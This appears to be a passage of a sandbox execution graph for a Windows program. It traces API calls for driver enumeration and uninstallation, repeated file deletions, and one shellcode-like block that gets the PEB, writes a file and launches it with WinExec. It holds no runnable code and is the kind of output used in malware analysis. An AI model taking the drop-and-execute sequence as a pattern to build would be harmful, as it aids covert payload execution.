                                                              execution_graph 62882 5ccd4e 62885 5ccd12 62882->62885 62884 5ccd5b 62886 5ccd1e __ftelli64 62885->62886 62893 5ceba3 62886->62893 62892 5ccd3f __ftelli64 62892->62884 62908 5d703b 62893->62908 62895 5ccd23 62896 5ccc2b DecodePointer DecodePointer 62895->62896 62897 5ccc59 62896->62897 62898 5cccda 62896->62898 62897->62898 63019 5d1b6e 62897->63019 62907 5ccd48 LeaveCriticalSection 62898->62907 62900 5cccbd EncodePointer EncodePointer 62900->62898 62901 5ccc8f 62901->62898 62904 5d4318 __realloc_crt 74 API calls 62901->62904 62905 5cccab EncodePointer 62901->62905 62902 5ccc6b 62902->62900 62902->62901 63026 5d4318 62902->63026 62906 5ccca5 62904->62906 62905->62900 62906->62898 62906->62905 62907->62892 62909 5d7050 62908->62909 62910 5d7063 EnterCriticalSection 62908->62910 62915 5d6f79 62909->62915 62910->62895 62912 5d7056 62912->62910 62943 5cee2d 62912->62943 62916 5d6f85 __ftelli64 62915->62916 62917 5d6fad 62916->62917 62918 5d6f95 62916->62918 62919 5d6fab 62917->62919 62928 5d6fbb __ftelli64 62917->62928 62950 5d8466 70 API calls 2 library calls 62918->62950 62919->62917 62955 5d4287 70 API calls _malloc 62919->62955 62922 5d6f9a 62951 5d82b7 70 API calls 9 library calls 62922->62951 62924 5d6fc6 62926 5d6fcd 62924->62926 62927 5d6fdc 62924->62927 62925 5d6fa1 62952 5ceb8b 62925->62952 62956 5ce629 70 API calls __getptd_noexit 62926->62956 62931 5d703b __lock 69 API calls 62927->62931 62928->62912 62932 5d6fe3 62931->62932 62933 5d6feb InitializeCriticalSectionAndSpinCount 62932->62933 62934 5d7016 62932->62934 62935 5d6ffb 62933->62935 62938 5d7007 62933->62938 62959 5ce216 70 API calls 2 library calls 62934->62959 62957 5ce216 70 API calls 2 library calls 62935->62957 62960 5d7032 LeaveCriticalSection _doexit 62938->62960 62939 5d7001 62958 5ce629 70 API calls __getptd_noexit 62939->62958 62942 5d6fd2 62942->62928 62965 5d8466 70 API calls 2 library calls 62943->62965 62945 5cee37 62969 5d82b7 70 API calls 9 library calls 62945->62969 62947 5cee3f 62966 5cedf9 62947->62966 62950->62922 62951->62925 62961 5ceb60 GetModuleHandleW 62952->62961 62955->62924 62956->62942 62957->62939 62958->62938 62959->62938 62960->62942 62962 5ceb89 ExitProcess 62961->62962 62963 5ceb74 GetProcAddress 62961->62963 62963->62962 62964 5ceb84 62963->62964 62964->62962 62965->62945 62970 5ceca3 62966->62970 62968 5cee0a 62969->62947 62971 5cecaf __ftelli64 62970->62971 62972 5d703b __lock 65 API calls 62971->62972 62973 5cecb6 62972->62973 62975 5cece1 DecodePointer 62973->62975 62980 5ced60 62973->62980 62977 5cecf8 DecodePointer 62975->62977 62975->62980 62979 5ced0b 62977->62979 62978 5ceddd __ftelli64 62978->62968 62979->62980 62986 5ced22 DecodePointer 62979->62986 62993 5d5bd4 EncodePointer 62979->62993 62999 5cedce 62980->62999 62982 5cedc5 62984 5ceb8b __mtinitlocknum 3 API calls 62982->62984 62985 5cedce 62984->62985 62987 5ceddb 62985->62987 63004 5d6f62 LeaveCriticalSection 62985->63004 62994 5d5bd4 EncodePointer 62986->62994 62987->62968 62990 5ced2d 62995 4e1281 62990->62995 62993->62979 62994->62990 62996 4e128d 62995->62996 62997 4e12a8 DecodePointer DecodePointer 62995->62997 62996->62997 63005 4df3ce 62996->63005 62997->62979 63000 5cedae 62999->63000 63001 5cedd4 62999->63001 63000->62978 63003 5d6f62 LeaveCriticalSection 63000->63003 63018 5d6f62 LeaveCriticalSection 63001->63018 63003->62982 63004->62987 63010 4df2c1 63005->63010 63007 4df3db 63008 4df3e7 63007->63008 63016 4e11af LocalFree 63007->63016 63008->62997 63011 4df2cd __EH_prolog3 moneypunct 63010->63011 63012 4df359 63011->63012 63013 4df34b RtlReleaseActivationContext 63011->63013 63017 4e16bc EnterCriticalSection LeaveCriticalSection 63012->63017 63013->63012 63015 4df365 ctype ~_Task_impl 63015->63007 63016->63008 63017->63015 63018->63000 63020 5d1b8e HeapSize 63019->63020 63021 5d1b79 63019->63021 63020->62902 63032 5ce629 70 API calls __getptd_noexit 63021->63032 63023 5d1b7e 63033 5d406b 11 API calls __wctomb_s_l 63023->63033 63025 5d1b89 63025->62902 63028 5d4321 63026->63028 63029 5d4360 63028->63029 63030 5d4341 Sleep 63028->63030 63034 5cf91b 63028->63034 63029->62901 63031 5d4356 63030->63031 63031->63028 63031->63029 63032->63023 63033->63025 63035 5cf926 63034->63035 63036 5cf931 63034->63036 63055 5ce4b1 63035->63055 63038 5cf939 63036->63038 63047 5cf946 63036->63047 63072 5ce216 70 API calls 2 library calls 63038->63072 63041 5cf97e 63074 5d8a17 DecodePointer 63041->63074 63043 5cf94e RtlReAllocateHeap 63043->63047 63054 5cf941 _free 63043->63054 63044 5cf984 63075 5ce629 70 API calls __getptd_noexit 63044->63075 63046 5cf9ae 63077 5ce629 70 API calls __getptd_noexit 63046->63077 63047->63041 63047->63043 63047->63046 63051 5cf996 63047->63051 63073 5d8a17 DecodePointer 63047->63073 63050 5cf9b3 GetLastError 63050->63054 63076 5ce629 70 API calls __getptd_noexit 63051->63076 63053 5cf99b GetLastError 63053->63054 63054->63028 63056 5ce52e 63055->63056 63069 5ce4bf 63055->63069 63083 5d8a17 DecodePointer 63056->63083 63058 5ce4ca 63068 5ceb8b __mtinitlocknum 3 API calls 63058->63068 63058->63069 63078 5d8466 70 API calls 2 library calls 63058->63078 63079 5d82b7 70 API calls 9 library calls 63058->63079 63059 5ce534 63084 5ce629 70 API calls __getptd_noexit 63059->63084 63062 5ce4ed RtlAllocateHeap 63063 5ce526 63062->63063 63062->63069 63063->63028 63065 5ce51a 63081 5ce629 70 API calls __getptd_noexit 63065->63081 63068->63058 63069->63058 63069->63062 63069->63065 63070 5ce518 63069->63070 63080 5d8a17 DecodePointer 63069->63080 63082 5ce629 70 API calls __getptd_noexit 63070->63082 63072->63054 63073->63047 63074->63044 63075->63054 63076->63053 63077->63050 63078->63058 63079->63058 63080->63069 63081->63070 63082->63063 63083->63059 63084->63063 63085 4de70e 63086 4de71a 63085->63086 63088 4de725 63086->63088 63101 4dacff 63086->63101 63093 4d8d50 63088->63093 63090 4de732 63106 5d18bf 81 API calls 2 library calls 63090->63106 63092 4de73d ctype 63094 4d8d7f ctype 63093->63094 63096 4d8d94 63094->63096 63107 4d8c10 63094->63107 63098 4d8dce 63096->63098 63125 4dae2a 103 API calls ctype 63096->63125 63098->63090 63099 4d8dc1 63099->63098 63126 4d8850 78 API calls 2 library calls 63099->63126 63102 5cf7e9 __CxxThrowException@8 RaiseException 63101->63102 63103 4dad1a __EH_prolog3 63102->63103 63184 4e1192 LocalAlloc 63103->63184 63105 4dad31 ctype ~_Task_impl 63105->63086 63106->63092 63108 4d8c1d 63107->63108 63109 4d8c22 63107->63109 63147 4dacc7 RaiseException __CxxThrowException@8 63108->63147 63127 4da4fd 63109->63127 63113 4d8c41 63113->63096 63114 4d8c10 ctype 73 API calls 63115 4d8c5a 63114->63115 63116 4d8c72 63115->63116 63121 4d8c7f 63115->63121 63148 4d8a00 73 API calls ctype 63116->63148 63118 4d8c77 63118->63096 63119 4d8c10 73 API calls ctype 63119->63121 63121->63119 63124 4d8cfa 63121->63124 63139 4d8b70 63121->63139 63149 5cced2 70 API calls 2 library calls 63121->63149 63150 5cce5d 63121->63150 63124->63096 63125->63099 63126->63098 63128 4da509 __EH_prolog3 63127->63128 63159 4d8e6a 63128->63159 63130 4da510 ctype 63163 5cf7e9 63130->63163 63132 4da54e FormatMessageW 63134 4d8c28 63132->63134 63135 4da585 63132->63135 63134->63113 63134->63114 63166 5ce250 70 API calls __wctomb_s_l 63135->63166 63137 4da595 ctype 63138 4da59b LocalFree 63137->63138 63138->63134 63140 4d8b80 63139->63140 63141 4d8b88 63140->63141 63145 4d8b93 63140->63145 63167 4d8a90 63141->63167 63143 4d8bc0 63143->63121 63145->63143 63175 4d8b30 73 API calls ctype 63145->63175 63148->63118 63149->63121 63153 5cce6e _memset 63150->63153 63155 5cce6a _memmove 63150->63155 63151 5cce74 63181 5ce629 70 API calls __getptd_noexit 63151->63181 63153->63151 63153->63155 63156 5cceb9 63153->63156 63154 5cce79 63182 5d406b 11 API calls __wctomb_s_l 63154->63182 63155->63121 63156->63155 63183 5ce629 70 API calls __getptd_noexit 63156->63183 63162 4d8e72 63159->63162 63160 5ce4b1 _malloc 70 API calls 63160->63162 63161 4d8e94 63161->63130 63162->63160 63162->63161 63164 5cf81e RaiseException 63163->63164 63165 5cf812 63163->63165 63164->63132 63165->63164 63166->63137 63168 4d8aab 63167->63168 63176 4daf3a 63168->63176 63171 4d8ac4 63172 5cce5d _memcpy_s 70 API calls 63171->63172 63173 4d8ae3 63172->63173 63173->63121 63175->63143 63177 4daf4e 63176->63177 63178 4d8ab9 63176->63178 63179 5ce4b1 _malloc 70 API calls 63177->63179 63178->63171 63180 4d8b20 73 API calls ctype 63178->63180 63179->63178 63180->63171 63181->63154 63182->63155 63183->63154 63185 4e11ab 63184->63185 63186 4e11a6 63184->63186 63185->63105 63188 4dacc7 RaiseException __CxxThrowException@8 63186->63188 63189 676000 63191 676044 GetPEB 63189->63191 63193 676077 CreateFileA 63191->63193 63194 676265 63193->63194 63195 67622d 63193->63195 63196 676246 WriteFile 63195->63196 63197 676244 63195->63197 63198 676255 CloseHandle WinExec 63196->63198 63197->63198 63198->63194 63199 4faca7 63201 4facb3 __EH_prolog3_GS 63199->63201 63200 4facf8 63202 4fad34 63200->63202 63203 4fad00 GetParent 63200->63203 63201->63200 63201->63203 63321 4f83ab 11 API calls __crtLCMapStringA_stat 63201->63321 63205 4fadad 63202->63205 63212 4fad39 63202->63212 63322 4e8f99 104 API calls 2 library calls 63203->63322 63301 4f6589 LocalAlloc PtInRect RaiseException ctype 63205->63301 63207 4fad11 63323 4dbbb4 LocalAlloc RaiseException ctype 63207->63323 63209 4fad73 63216 4fad8c SetCursor 63209->63216 63217 4fad98 63209->63217 63211 4fad1c 63211->63202 63215 4fad22 GetParent 63211->63215 63212->63209 63326 4f83ab 11 API calls __crtLCMapStringA_stat 63212->63326 63324 4e8f99 104 API calls 2 library calls 63215->63324 63216->63217 63327 54baaa 99 API calls 63217->63327 63218 4fad6a UpdateWindow 63218->63209 63222 4fadb7 63223 4fae24 63222->63223 63230 4fadf2 GetAsyncKeyState 63222->63230 63253 4faee8 63222->63253 63227 4fb20d 63223->63227 63229 4fae50 63223->63229 63224 4fad2d 63325 4ece25 108 API calls ctype 63224->63325 63225 4fada8 63225->63253 63341 4f66e9 LocalAlloc PtInRect RaiseException 63227->63341 63236 4fae8d 63229->63236 63328 4f83ab 11 API calls __crtLCMapStringA_stat 63229->63328 63230->63223 63232 4fae04 63230->63232 63231 4fb21e 63233 4fb233 63231->63233 63342 4dbb6b LocalAlloc RaiseException ctype 63231->63342 63232->63223 63233->63253 63343 4f83ab 11 API calls __crtLCMapStringA_stat 63233->63343 63302 4f6589 LocalAlloc PtInRect RaiseException ctype 63236->63302 63238 4fb254 UpdateWindow 63242 4fb26a 63238->63242 63240 4fae9a 63241 4dacff ctype 2 API calls 63240->63241 63243 4faeb0 63240->63243 63241->63243 63244 4fb2be SetCapture 63242->63244 63252 4fb277 ctype 63242->63252 63245 4faeed 63243->63245 63246 4faec7 63243->63246 63345 4e8f99 104 API calls 2 library calls 63244->63345 63303 4f83ab 11 API calls __crtLCMapStringA_stat 63245->63303 63246->63253 63329 4f83ab 11 API calls __crtLCMapStringA_stat 63246->63329 63250 4fb1fd 63250->63253 63346 4f8b36 105 API calls ctype 63250->63346 63251 4faef7 UpdateWindow 63254 4faf0b ctype 63251->63254 63344 4f83ab 11 API calls __crtLCMapStringA_stat 63252->63344 63347 5ceb42 63253->63347 63259 4faf29 63254->63259 63260 4faf88 63254->63260 63256 4fb2ed RedrawWindow 63256->63253 63258 4fb2b3 UpdateWindow 63258->63250 63262 4faf4f InflateRect 63259->63262 63263 4faf60 SetCapture 63259->63263 63260->63250 63304 55baeb 103 API calls 63260->63304 63262->63263 63330 4e8f99 104 API calls 2 library calls 63263->63330 63265 4faf6f SetCursor 63265->63250 63266 4fafb6 63305 55be4a 63266->63305 63269 4fb04e GetCursorPos ScreenToClient 63271 4fb077 PtInRect 63269->63271 63300 4fb19a 63269->63300 63270 4fb023 63331 55bb18 10 API calls 4 library calls 63270->63331 63276 4fb08f 63271->63276 63271->63300 63273 4fb1ac 63275 4fb1b6 InvalidateRect 63273->63275 63273->63300 63275->63300 63276->63273 63277 4fb0c9 63276->63277 63332 4f6433 LocalAlloc RaiseException ctype 63277->63332 63279 4fb0d8 RedrawWindow 63281 4fb107 GetParent 63279->63281 63333 4e8f99 104 API calls 2 library calls 63281->63333 63283 4fb118 63284 4fb13c 63283->63284 63285 4fb121 GetParent 63283->63285 63286 4fb15e GetParent 63284->63286 63290 4fb14e RedrawWindow 63284->63290 63334 4e8f99 104 API calls 2 library calls 63285->63334 63335 4e8f99 104 API calls 2 library calls 63286->63335 63289 4fb12c RedrawWindow 63289->63284 63290->63286 63291 4fb169 63336 4dbb6b LocalAlloc RaiseException ctype 63291->63336 63293 4fb175 63294 4fb179 GetParent 63293->63294 63293->63300 63337 4e8f99 104 API calls 2 library calls 63294->63337 63296 4fb184 GetParent 63338 4e8f99 104 API calls 2 library calls 63296->63338 63298 4fb18f 63339 4dbbb4 LocalAlloc RaiseException ctype 63298->63339 63340 55bb18 10 API calls 4 library calls 63300->63340 63301->63222 63302->63240 63303->63251 63304->63266 63306 55be56 __EH_prolog3_GS 63305->63306 63350 55bd98 63306->63350 63308 55be67 63309 55be87 GetCursorPos SetRect 63308->63309 63310 55be7a CopyRect 63308->63310 63311 55bead 63309->63311 63310->63311 63312 55bec1 IsRectEmpty 63311->63312 63313 55beb8 63311->63313 63312->63313 63314 55becc InflateRect 63312->63314 63360 4d956a 103 API calls ctype 63313->63360 63314->63313 63316 55bee1 moneypunct 63317 55beeb moneypunct 63316->63317 63319 55bf1e DoDragDrop 63316->63319 63318 5ceb42 ctype 5 API calls 63317->63318 63320 4fb015 IsWindow 63318->63320 63319->63317 63320->63269 63320->63270 63321->63200 63322->63207 63323->63211 63324->63224 63325->63202 63326->63218 63327->63225 63328->63236 63329->63253 63330->63265 63331->63253 63332->63279 63333->63283 63334->63289 63335->63291 63336->63293 63337->63296 63338->63298 63339->63300 63340->63250 63341->63231 63342->63233 63343->63238 63344->63258 63345->63250 63346->63256 63426 5cc787 63347->63426 63349 5ceb4c 63349->63349 63351 55bda4 __EH_prolog3 63350->63351 63361 4dc69a 63351->63361 63355 55bddc 63356 55bde4 GetProfileIntW GetProfileIntW 63355->63356 63357 55be1a 63355->63357 63356->63357 63374 4e6268 LocalAlloc LeaveCriticalSection RaiseException ctype 63357->63374 63359 55be21 ~_Task_impl 63359->63308 63360->63316 63375 4df877 63361->63375 63364 4e61f6 63365 4e620b 63364->63365 63366 4e6206 63364->63366 63368 4e6219 63365->63368 63425 4e61d2 InitializeCriticalSection 63365->63425 63367 4dacff ctype 2 API calls 63366->63367 63367->63365 63370 4e622b EnterCriticalSection 63368->63370 63371 4e6255 EnterCriticalSection 63368->63371 63372 4e624a LeaveCriticalSection 63370->63372 63373 4e6237 InitializeCriticalSection 63370->63373 63371->63355 63372->63371 63373->63372 63374->63359 63380 4e1632 63375->63380 63377 4dc6a4 63377->63364 63378 4df886 63378->63377 63391 4e1231 8 API calls 3 library calls 63378->63391 63383 4e163e __EH_prolog3 63380->63383 63381 4dacff ctype 2 API calls 63381->63383 63382 4e168c 63411 4e11c5 EnterCriticalSection 63382->63411 63383->63381 63383->63382 63392 4e143b TlsAlloc 63383->63392 63396 4e1323 EnterCriticalSection 63383->63396 63388 4e169f 63418 4e14e2 81 API calls 4 library calls 63388->63418 63389 4e16b2 ~_Task_impl 63389->63378 63391->63378 63393 4e146c InitializeCriticalSection 63392->63393 63394 4e1467 63392->63394 63393->63383 63419 4dacc7 RaiseException __CxxThrowException@8 63394->63419 63400 4e1346 63396->63400 63397 4e141c LeaveCriticalSection 63397->63383 63398 4e137f 63420 4dafc0 63398->63420 63399 4e1394 GlobalHandle GlobalUnlock 63402 4dafc0 ctype 73 API calls 63399->63402 63400->63398 63400->63399 63407 4e1405 _memset 63400->63407 63404 4e13b2 GlobalReAlloc 63402->63404 63405 4e13be 63404->63405 63406 4e13e5 GlobalLock 63405->63406 63408 4e13c9 GlobalHandle GlobalLock 63405->63408 63409 4e13d7 LeaveCriticalSection 63405->63409 63406->63407 63407->63397 63408->63409 63424 4dacc7 RaiseException __CxxThrowException@8 63409->63424 63412 4e1207 LeaveCriticalSection 63411->63412 63413 4e11e0 63411->63413 63415 4e1210 63412->63415 63413->63412 63414 4e11e5 TlsGetValue 63413->63414 63414->63412 63416 4e11f1 63414->63416 63415->63388 63415->63389 63416->63412 63417 4e11f6 LeaveCriticalSection 63416->63417 63417->63415 63418->63389 63421 4dafd5 ctype 63420->63421 63422 4dafe2 GlobalAlloc 63421->63422 63423 4d8c10 ctype 73 API calls 63421->63423 63422->63405 63423->63422 63425->63368 63427 5cc78f 63426->63427 63428 5cc791 IsDebuggerPresent 63426->63428 63427->63349 63434 5e07c8 63428->63434 63431 5d3b41 SetUnhandledExceptionFilter UnhandledExceptionFilter 63432 5d3b5e __call_reportfault 63431->63432 63433 5d3b66 GetCurrentProcess TerminateProcess 63431->63433 63432->63433 63433->63349 63434->63431 63435 547c0e 63436 547c1a __EH_prolog3 ctype 63435->63436 63445 4d86c0 63436->63445 63438 547c75 63439 547d08 63438->63439 63440 547cdf CreateCompatibleDC CreateCompatibleDC 63438->63440 63450 547836 352 API calls 4 library calls 63439->63450 63441 547cff 63440->63441 63441->63439 63449 4dfc45 RaiseException __CxxThrowException@8 63441->63449 63444 547d9a ~_Task_impl 63446 4d86cd 63445->63446 63447 4d86d7 63445->63447 63448 4d8c10 ctype 73 API calls 63446->63448 63447->63438 63448->63447 63450->63444 63451 4d1020 GetCommandLineW GetModuleHandleW 63548 4da2c5 SetErrorMode SetErrorMode 63451->63548 63454 4d107a 63456 4d8d50 107 API calls 63454->63456 63457 4d1097 63456->63457 63458 4d10ca GetWindowsDirectoryW 63457->63458 63460 4d8b70 ctype 73 API calls 63457->63460 63459 4d10de GetLastError 63458->63459 63465 4d119e _wcsnlen 63458->63465 63666 4d6400 71 API calls 63459->63666 63462 4d10c4 63460->63462 63462->63458 63463 4d10f4 63667 4d2e70 108 API calls 2 library calls 63463->63667 63541 4d1a89 moneypunct 63465->63541 63561 4d2d90 63465->63561 63466 4d8c10 ctype 73 API calls 63468 4d1b59 63466->63468 63467 4d10fd 63668 4d8330 71 API calls 63467->63668 63473 4d114e 63476 5cc787 __crtLCMapStringA_stat 5 API calls 63473->63476 63474 4d1108 63474->63473 63669 4d8570 71 API calls 2 library calls 63474->63669 63478 4d119a 63476->63478 63477 4d16d0 63622 4d2540 SetupDiGetClassDevsW 63477->63622 63482 4d2d90 73 API calls 63483 4d16ed 63482->63483 63485 4d2d90 73 API calls 63483->63485 63486 4d1709 DeleteFileW 63485->63486 63487 4d172f 63486->63487 63488 4d2d90 73 API calls 63487->63488 63490 4d1751 DeleteFileW 63488->63490 63491 4d1771 63490->63491 63492 4d2d90 73 API calls 63491->63492 63493 4d1793 DeleteFileW 63492->63493 63494 4d17b3 63493->63494 63495 4d2d90 73 API calls 63494->63495 63497 4d17d5 DeleteFileW 63495->63497 63498 4d17f5 63497->63498 63499 4d2d90 73 API calls 63498->63499 63500 4d1817 DeleteFileW 63499->63500 63501 4d1837 63500->63501 63502 4d2d90 73 API calls 63501->63502 63506 4d1859 DeleteFileW 63502->63506 63503 4d8b70 73 API calls ctype 63518 4d1217 _memset __crtLCMapStringA_stat _wcsrchr 63503->63518 63504 4d13be lstrlenW 63504->63518 63507 4d1879 63506->63507 63508 4d2d90 73 API calls 63507->63508 63510 4d189b DeleteFileW 63508->63510 63509 4d6400 71 API calls 63509->63518 63512 4d18bb 63510->63512 63511 4d13dd WideCharToMultiByte 63511->63518 63513 4d2d90 73 API calls 63512->63513 63514 4d18dd DeleteFileW 63513->63514 63515 4d18fd 63514->63515 63516 4d2d90 73 API calls 63515->63516 63517 4d191f DeleteFileW 63516->63517 63520 4d193f 63517->63520 63518->63477 63518->63503 63518->63504 63518->63509 63518->63511 63519 4d148e lstrlenW 63518->63519 63524 4d14ad WideCharToMultiByte 63518->63524 63528 4d8330 71 API calls 63518->63528 63532 4d153a SetupUninstallOEMInfW 63518->63532 63542 4d15c3 lstrlenW 63518->63542 63543 4d8570 71 API calls 63518->63543 63544 4d15e2 WideCharToMultiByte 63518->63544 63545 4d167b DeleteFileW DeleteFileW 63518->63545 63546 4d1655 63518->63546 63590 4d1ff0 63518->63590 63670 5ce250 70 API calls __wctomb_s_l 63518->63670 63671 4d80e0 73 API calls 2 library calls 63518->63671 63672 4d2c70 73 API calls 63518->63672 63673 4d8070 63518->63673 63680 4d8570 71 API calls 2 library calls 63518->63680 63682 4d3050 108 API calls 2 library calls 63518->63682 63519->63518 63521 4d2d90 73 API calls 63520->63521 63522 4d1961 DeleteFileW 63521->63522 63523 4d1981 63522->63523 63525 4d2d90 73 API calls 63523->63525 63524->63518 63526 4d19a3 DeleteFileW 63525->63526 63527 4d19c3 63526->63527 63529 4d2d90 73 API calls 63527->63529 63528->63518 63530 4d19e5 DeleteFileW 63529->63530 63531 4d1a05 63530->63531 63533 4d2d90 73 API calls 63531->63533 63681 4d6400 71 API calls 63532->63681 63535 4d1a27 DeleteFileW 63533->63535 63537 4d1a47 63535->63537 63539 4d2d90 73 API calls 63537->63539 63540 4d1a69 DeleteFileW 63539->63540 63540->63541 63541->63466 63542->63518 63543->63518 63544->63518 63545->63518 63545->63546 63546->63518 63683 4d8570 71 API calls 2 library calls 63546->63683 63549 4df877 ctype 103 API calls 63548->63549 63550 4da2e2 63549->63550 63684 4df00f GetModuleFileNameW 63550->63684 63553 4df877 ctype 103 API calls 63554 4da2f7 63553->63554 63555 4da314 63554->63555 63694 4da0e9 63554->63694 63557 4df877 ctype 103 API calls 63555->63557 63558 4da319 63557->63558 63559 4d106c 63558->63559 63717 4dc207 105 API calls ctype 63558->63717 63559->63454 63665 5ccdb6 108 API calls 6 library calls 63559->63665 63562 4d2dcf ctype 63561->63562 63563 4d8c10 ctype 73 API calls 63562->63563 63564 4d2dfd 63562->63564 63563->63564 63756 4d3ef0 63564->63756 63567 4d1b60 63762 4db74b 63567->63762 63571 4d1baa 63774 4d5e30 63571->63774 63575 4d1c2f 63576 4d1f85 ctype 63575->63576 63579 4d1fd1 63575->63579 63588 4dba35 74 API calls 63575->63588 63589 4d1b60 103 API calls 63575->63589 63812 4db3bb 63575->63812 63818 4dbace 63575->63818 63822 5cd45b 63575->63822 63825 4d2d20 63575->63825 63833 4dba35 63575->63833 63576->63518 63580 4d8c10 ctype 73 API calls 63579->63580 63581 4d1fdb 63580->63581 63843 5e8541 71 API calls 2 library calls 63581->63843 63584 4d1fe5 63587 4d1db7 GetFileAttributesW 63587->63575 63588->63575 63589->63575 63591 4d8d50 107 API calls 63590->63591 63592 4d203e 63591->63592 63593 4d8d50 107 API calls 63592->63593 63594 4d2050 63593->63594 63595 4d8d50 107 API calls 63594->63595 63596 4d2063 63595->63596 63597 4d8d50 107 API calls 63596->63597 63598 4d2076 SetupOpenInfFileW 63597->63598 63599 4d2145 SetupFindFirstLineW 63598->63599 63603 4d209a 63598->63603 63600 4d215f 63599->63600 63601 4d2209 SetupCloseInfFile 63599->63601 63914 4d2a40 77 API calls 2 library calls 63600->63914 63605 4d222b 63601->63605 63603->63518 63604 4d2172 63604->63601 63915 4d80e0 73 API calls 2 library calls 63604->63915 63605->63518 63607 4d218c 63916 4d22c0 125 API calls 63607->63916 63609 4d2196 63610 4d21fa 63609->63610 63917 4d2a40 77 API calls 2 library calls 63609->63917 63610->63601 63612 4d21ae 63612->63601 63918 4d2af0 73 API calls 63612->63918 63614 4d21c3 63615 4d5e30 73 API calls 63614->63615 63616 4d21d5 63615->63616 63919 4d8000 73 API calls ctype 63616->63919 63618 4d21e3 63920 4d80e0 73 API calls 2 library calls 63618->63920 63620 4d21f4 63921 4d22c0 125 API calls 63620->63921 63623 4d2a0e 63622->63623 63626 4d2586 ctype 63622->63626 63624 5cc787 __crtLCMapStringA_stat 5 API calls 63623->63624 63625 4d16d5 63624->63625 63625->63482 63627 4d25a7 SetupDiEnumDeviceInfo 63626->63627 63628 4d8c10 ctype 73 API calls 63626->63628 63630 4d2664 SetupDiGetDeviceRegistryPropertyW 63627->63630 63631 4d25d0 GetLastError 63627->63631 63628->63627 63634 4d2687 GetLastError 63630->63634 63661 4d2662 __crtLCMapStringA_stat 63630->63661 63632 4d25e0 GetLastError 63631->63632 63633 4d2659 SetupDiDestroyDeviceInfoList 63631->63633 63632->63633 63635 4d25ed GetLastError 63632->63635 63633->63623 63636 4d26ea GetLastError 63634->63636 63637 4d2694 GetLastError 63634->63637 63922 4d6400 71 API calls 63635->63922 63641 4d29c2 SetupDiEnumDeviceInfo 63636->63641 63636->63661 63637->63635 63640 4d269f 63637->63640 63644 4d26ad LocalAlloc 63640->63644 63645 4d26a6 LocalFree 63640->63645 63642 4d29e3 63641->63642 63641->63661 63649 4d8c10 ctype 73 API calls 63642->63649 63643 4d25ff 63923 4d2e70 108 API calls 2 library calls 63643->63923 63644->63635 63647 4d26c5 SetupDiGetDeviceRegistryPropertyW 63644->63647 63645->63644 63647->63634 63647->63661 63648 4d2608 63924 4d8330 71 API calls 63648->63924 63649->63633 63651 4d2613 63651->63633 63925 4d8570 71 API calls 2 library calls 63651->63925 63653 4d8b70 ctype 73 API calls 63653->63661 63655 4d282a lstrlenW 63655->63661 63656 4d2849 WideCharToMultiByte 63656->63661 63657 4d6400 71 API calls 63657->63661 63658 4d8330 71 API calls 63658->63661 63659 4d28d9 lstrlenW 63659->63661 63661->63630 63661->63636 63661->63641 63661->63642 63661->63653 63661->63655 63661->63656 63661->63657 63661->63658 63661->63659 63662 4d28fb WideCharToMultiByte 63661->63662 63663 4d298b SetupDiCallClassInstaller 63661->63663 63926 5cd2a1 81 API calls __wcsupr_s_l 63661->63926 63927 4d8570 71 API calls 2 library calls 63661->63927 63928 4d8570 71 API calls 2 library calls 63661->63928 63662->63661 63663->63661 63665->63454 63666->63463 63667->63467 63668->63474 63669->63473 63670->63518 63671->63518 63672->63518 63676 4d8081 63673->63676 63674 4d808e 63674->63518 63675 4d80b8 63678 5cce5d _memcpy_s 70 API calls 63675->63678 63676->63674 63676->63675 63929 4d8b20 73 API calls ctype 63676->63929 63679 4d80d4 63678->63679 63679->63518 63680->63532 63681->63518 63682->63518 63683->63545 63685 4df050 63684->63685 63693 4df0ee 63684->63693 63686 4df064 CreateActCtxWWorker 63685->63686 63687 4df057 SetLastError 63685->63687 63689 4df0ae CreateActCtxWWorker 63686->63689 63690 4df0c7 63686->63690 63687->63693 63688 5cc787 __crtLCMapStringA_stat 5 API calls 63691 4da2f2 63688->63691 63689->63690 63692 4df0d0 CreateActCtxWWorker 63690->63692 63690->63693 63691->63553 63692->63693 63693->63688 63695 4df877 ctype 103 API calls 63694->63695 63696 4da108 GetModuleFileNameW 63695->63696 63697 4da130 63696->63697 63698 4da139 PathFindExtensionW 63697->63698 63726 4dfc61 RaiseException moneypunct __CxxThrowException@8 63697->63726 63700 4da155 63698->63700 63701 4da150 63698->63701 63718 4da0a3 63700->63718 63727 4dfc61 RaiseException moneypunct __CxxThrowException@8 63701->63727 63704 4da174 63705 4da17d 63704->63705 63728 4dfc61 RaiseException moneypunct __CxxThrowException@8 63704->63728 63711 4da18f ctype 63705->63711 63729 5cf65f 70 API calls 4 library calls 63705->63729 63708 4dadc2 107 API calls 63708->63711 63710 4da2b6 63712 5cc787 __crtLCMapStringA_stat 5 API calls 63710->63712 63711->63708 63711->63710 63715 5cf65f 70 API calls __wcsdup 63711->63715 63730 4dacc7 RaiseException __CxxThrowException@8 63711->63730 63731 5ce545 63711->63731 63740 5cf5ea 63711->63740 63716 4da2c3 63712->63716 63715->63711 63716->63555 63717->63559 63719 4da0ae 63718->63719 63720 4da0b3 PathFindFileNameW 63718->63720 63723 4dacff ctype 2 API calls 63719->63723 63721 4da0cc 63720->63721 63722 4da0c2 lstrlenW 63720->63722 63749 5ce250 70 API calls __wctomb_s_l 63721->63749 63725 4da0da ctype 63722->63725 63723->63720 63725->63704 63726->63698 63727->63700 63728->63705 63729->63711 63732 5ce55a 63731->63732 63733 5ce553 63731->63733 63750 5ce629 70 API calls __getptd_noexit 63732->63750 63733->63732 63736 5ce57b 63733->63736 63737 5ce569 63736->63737 63752 5ce629 70 API calls __getptd_noexit 63736->63752 63737->63711 63739 5ce55f 63751 5d406b 11 API calls __wctomb_s_l 63739->63751 63741 5cf5ff 63740->63741 63744 5cf5f8 63740->63744 63753 5ce629 70 API calls __getptd_noexit 63741->63753 63743 5cf604 63754 5d406b 11 API calls __wctomb_s_l 63743->63754 63744->63741 63747 5cf634 63744->63747 63746 5cf60e 63746->63711 63747->63746 63755 5ce629 70 API calls __getptd_noexit 63747->63755 63749->63725 63750->63739 63751->63737 63752->63739 63753->63743 63754->63746 63755->63743 63760 4d3f03 63756->63760 63757 4d8c10 ctype 73 API calls 63757->63760 63758 4d8b70 ctype 73 API calls 63758->63760 63759 5cce5d 70 API calls _memcpy_s 63759->63760 63760->63757 63760->63758 63760->63759 63761 4d120f 63760->63761 63761->63567 63763 4db75b ctype 63762->63763 63764 4d86c0 ctype 73 API calls 63763->63764 63765 4d1b98 63764->63765 63766 4d2ca0 63765->63766 63767 4d2cb7 63766->63767 63768 